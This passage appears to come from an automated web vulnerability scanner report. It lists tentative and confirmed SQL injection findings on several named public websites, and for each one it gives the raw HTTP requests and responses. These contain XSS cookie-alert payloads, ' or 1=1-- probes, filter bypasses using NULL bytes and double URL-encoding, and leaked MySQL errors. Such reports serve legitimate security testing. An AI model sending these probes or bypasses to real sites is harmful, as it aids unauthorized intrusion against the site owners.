<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/
...[SNIP]...
<br> -->

   <span class="CommentHeader">Comments</span><BR>
   <BR>
   <a name="post_msg"></a></font>

   

   <!--
   <span class="SortBy">Sort by Post:
   <a href="/online/article.jsp?id=1358448181--><script>alert(document.cookie)</script>c11697f1d6d13150409' or 1=1-- &amp;OrderBy=InsertDate&amp;Dir=DESC">Most Recent</a>
   &ndash;
   <a href="/online/article.jsp?id=1358448181--><script>alert(document.cookie)</script>c11697f1d6d13150409' or 1=1-- &amp;OrderBy=InsertDate&amp;Dir=ASC">First Comment</a>
   <BR>
   -->
   
       <form action='/includes/comment_abuse.jsp?id=60797' target="_new" method="post">
       <div class="comment">
           <table width="100%" id="commentsTable" cellpadding="0" cellspacing="0">
               <tr>
                   <td width="70%" valign="top">
                       <div class="commentTop">Posted by <b>kmack</b> in Washington DC Metro </div>
                   </td>
       <td width="30%" align="right" valign="top" style="padding-left:4px;">
                       <div class="userDate">(08/25/10 - 11:05 AM)</div>
                   </td>
   </tr>
           </table>
           
           <div class="commentEntry">
               <div class="userSubject">Cummins CNG</div>
               <div class="userComment">Too bad Cummins seems incapable of figuring out their own CNG engines. They have had one bus since April and still havent been able to get it running correctly</div>
               <div class="commentReport">
                   <br>
                   <select name="reportType">
                       <option value="N/A">Select a Reason</option>
                       <option value="Spam">Spam</option>
                       <option value="Profanity / Language">Profanity / Language</option>
                       <option value="Personal Insult">Personal Insult</option>
                       <option value="Factual Error">Factual Error</option>
                   </select>
                   <input type="submit" name="reportComment" value="Report Comment">
               </div>
           </div>
           <div class="commentBottom"></div>
       </div>
       </form>
       <BR>
       <BR>
       
       <form action='/includes/comment_abuse.jsp?id=60799' target="_new" method="post">
       <div class="comment">
           <table wi
...[SNIP]...

Request 2

GET /online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d13150409'%20or%201%3d2--%20&pageNum=1 HTTP/1.1
Host: www.masstransitmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:14:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=33D33115EF50D3415CA16C6D684D81C4.transportation-app2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/
...[SNIP]...
<br> -->

<div align="right">
   
</div>

<div align="right">
   
</div>

<a name="commentform"></a></font>

   <hr>
   <div class="CommentForm">
       <form name="form" method="post" action="/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d13150409'%20or%201%3d2--%20&pageNum=1" class="commentform" onSubmit="JavaScript: return checkit(form)">    
           
           <input type="hidden" name="submit_comment" value="y">
           <input type="hidden" name="PostProc" value="T" />
           <input type="hidden" name="ArtID" value="1358448181--><script>alert(document.cookie)</script>c11697f1d6d13150409' or 1=2-- " />
           <input type="hidden" name="ArtTitle" value="" />
           <input type="hidden" name="ReplyID" value="" />
   
           <!-- <h2><span>Submit</span> a Comment</h2> -->
           <font size="+2"><b>Submit a Comment</b></font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span class="UserInstructions">(comments will appear after this article, as well as on our <a href='http://www.masstransitmag.com/readersrespond/'>Readers Respond Page</a>)</span>
           <a name="formstart">&nbsp;</a>
           <table width="500" border="0">
               <tr>
                   <td width="105" nowrap><span class="req"> *</span><span class="CommentName">Name: </span></td>
                   <td width="385"><span class="CommentName"><input name="Name" type="text" id="Name" value="" size="38" maxlength="150" /></span></td>
               </tr>
               <tr>
                   <td nowrap><span class="CommentSubject">&nbsp;Subject:</span></td>
                   <td><span class="CommentLocation"><input name="Subject" type="text" id="Subject" value="" size="45" maxlength="150" /></span></td>
               </tr>
               <tr>
                   <td nowrap><span class="CommentLocation">&nbsp;City, State:</span></td>
                   <td><span class="CommentSubject"><input name="Location" type="text" id="Location" size="40" maxlength="200" value="" /></span></td>
               </tr>
               <tr>
                   <td nowrap><span class="CommentComment1"><span class="req">*</span><label for="label2">Comment:<span class="Comment
...[SNIP]...

1.120. https://www.networksolutions.com/manage-it/renewal-center.jsp [7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The 7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83%00' HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:43 GMT
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=iWrv; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=de83d3f8822ca01e1417623d5cf3; Expires=Wed, 12-Apr-2079 19:59:49 GMT; Path=/
Set-cookie: siteId=527-10; Expires=Mon, 19-Mar-2012 16:45:43 GMT; Path=/
Set-cookie: JSESSIONID=de83d3f8822ca01e1417623d5cf3; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Content-type: text/html;charset=UTF-8
Content-length: 31671
Date: Fri, 25 Mar 2011 16:45:43 GMT
Set-cookie: vertigo=false; Expires=Sat, 24-Mar-2012 16:45:43 GMT; Path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8"></meta>
       
       
...[SNIP]...
<input type="hidden" name="errorPage" value="/common/error.jsp" />
...[SNIP]...
<input type="hidden" name="authenticationFailedPage" value="" />
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83%00'' HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:45 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:45:44 GMT
Connection: close


1.121. https://www.networksolutions.com/manage-it/renewal-center.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /manage-it%2527/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:46:20 GMT
Location: https://www.networksolutions.com/common/error.jsp
Content-type: text/html;charset=UTF-8
Date: Fri, 25 Mar 2011 16:46:19 GMT
Set-cookie: JROUTE=tUzY.tUzY; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Connection: close

Request 2

GET /manage-it%2527%2527/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:46:24 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:46:24 GMT
Connection: close


1.122. https://www.networksolutions.com/manage-it/renewal-center.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /manage-it/renewal-center.jsp' HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:55 GMT
Content-type: text/html
Last-modified: Fri, 18 Mar 2011 14:59:06 GMT
Content-length: 25921
Etag: W/"6541-4d83733a"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error | Network Solutions</title>
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp'' HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:46:00 GMT
Content-type: text/html
Last-modified: Fri, 18 Mar 2011 14:59:05 GMT
Content-length: 1875
Etag: W/"753-4d837339"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>Domain Names, Web Hosting and Online Marketing Services | Network Solutio
...[SNIP]...

1.123. https://www.networksolutions.com/manage-it/renewal-center.jsp [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /manage-it/renewal-center.jsp HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:43 GMT
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=KTdR; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=de83d9b2262e100f1f56a2624062; Expires=Wed, 12-Apr-2079 19:59:49 GMT; Path=/
Set-cookie: siteId=527-10; Expires=Mon, 19-Mar-2012 16:45:43 GMT; Path=/
Set-cookie: JSESSIONID=de83d9b2262e100f1f56a2624062; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Content-type: text/html;charset=UTF-8
Content-length: 31271
Date: Fri, 25 Mar 2011 16:45:43 GMT
Set-cookie: vertigo=false; Expires=Sat, 24-Mar-2012 16:45:43 GMT; Path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8"></meta>
       
       
...[SNIP]...
<input type="hidden" name="errorPage" value="/common/error.jsp" />
...[SNIP]...
<input type="hidden" name="authenticationFailedPage" value="" />
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:47 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:45:47 GMT
Connection: close


1.124. https://www.networksolutions.com/manage-it/renewal-center.jsp [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /manage-it/renewal-center.jsp HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:39 GMT
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=KTdR; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=de82e9f1b9c886fb3cd5a6768f84; Expires=Wed, 12-Apr-2079 19:59:45 GMT; Path=/
Set-cookie: siteId=527-10; Expires=Mon, 19-Mar-2012 16:45:39 GMT; Path=/
Set-cookie: JSESSIONID=de82e9f1b9c886fb3cd5a6768f84; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Content-type: text/html;charset=UTF-8
Content-length: 31672
Date: Fri, 25 Mar 2011 16:45:39 GMT
Set-cookie: vertigo=false; Expires=Sat, 24-Mar-2012 16:45:39 GMT; Path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8"></meta>
       
       
...[SNIP]...
<input type="hidden" name="errorPage" value="/common/error.jsp" />
...[SNIP]...
<input type="hidden" name="authenticationFailedPage" value="" />
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:41 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:45:40 GMT
Connection: close


1.125. https://www.networksolutions.com/manage-it/renewal-center.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.networksolutions.com
Path:   /manage-it/renewal-center.jsp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E6fa7b01d733=1&1%00'=1 HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:46 GMT
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=KTdR; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=de847c5570a1f0a26cd6350b43c6; Expires=Wed, 12-Apr-2079 19:59:52 GMT; Path=/
Set-cookie: siteId=527-10; Expires=Mon, 19-Mar-2012 16:45:46 GMT; Path=/
Set-cookie: JSESSIONID=de847c5570a1f0a26cd6350b43c6; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Content-type: text/html;charset=UTF-8
Content-length: 31668
Date: Fri, 25 Mar 2011 16:45:46 GMT
Set-cookie: vertigo=false; Expires=Sat, 24-Mar-2012 16:45:46 GMT; Path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8"></meta>
       
       
...[SNIP]...
<input type="hidden" name="errorPage" value="/common/error.jsp" />
...[SNIP]...
<input type="hidden" name="authenticationFailedPage" value="" />
...[SNIP]...

Request 2

GET /manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E6fa7b01d733=1&1%00''=1 HTTP/1.1
Host: www.networksolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 25 Mar 2011 16:45:47 GMT
X-powered-by: Servlet/2.5
Location: https://www.networksolutions.com/session-exceeded.html
Content-type: text/html; charset=iso-8859-1
Content-length: 0
Date: Fri, 25 Mar 2011 16:45:47 GMT
Connection: close


1.126. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [3906b%22%3E%3Cscript%3Ealert(document.cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The 3906b%22%3E%3Cscript%3Ealert(document.cookie parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 3906b%22%3E%3Cscript%3Ealert(document.cookie parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie' HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=r16gob2tum7a692c66cjs8qc30; path=/
Connection: close
Content-Type: text/html
Content-Length: 7707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b' at line 1

Request 2

GET /xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie'' HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:35 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=jr6imn8pf5rg9jjm7ui0d6eec2; path=/
Connection: close
Content-Type: text/html
Content-Length: 22962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.127. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The 3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780=1' HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=6infg0q6aruev1efa0hht920l4; path=/
Connection: close
Content-Type: text/html
Content-Length: 7734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b' at line 1

Request 2

GET /xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780=1'' HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=2ctknn60p014qmkdcg3cidgeu0; path=/
Connection: close
Content-Type: text/html
Content-Length: 22989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.128. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=ekmcdkcg13ud5h14ihlihqluh7; path=/
Connection: close
Content-Type: text/html
Content-Length: 23775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.129. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html?1'=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=ajfnsvrm911se886mn7ea890n5; path=/
Connection: close
Content-Type: text/html
Content-Length: 7658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /xss-cross-site-scripting.html?1''=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:17:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=togl5l07b0ch6huifhi2p77eu3; path=/
Connection: close
Content-Type: text/html
Content-Length: 22921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.130. http://www.phpbuilder.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

